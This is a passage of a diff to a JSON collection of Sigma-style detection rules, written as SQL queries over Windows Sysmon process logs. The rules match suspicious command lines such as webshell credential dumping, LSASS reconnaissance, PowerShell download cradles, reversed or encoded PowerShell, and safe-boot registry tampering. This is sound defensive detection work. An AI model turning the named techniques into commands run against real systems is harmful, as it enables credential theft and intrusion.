'9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Suspicious Network Command", - "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_network_command.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Use of Adplus.exe", - "id": 
"2f869d59-7f6a-4931-992c-cce556ff2d53", - "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "status": "test", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", - "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + 
"description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') 
OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' 
AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", - "tags": [ - "attack.t1055" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate 
an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1566.001", "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') 
AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", - "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0069" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND 
CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": 
"Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "status": "test", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion" ], 
@@ -16606,1216 +16225,1161 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE 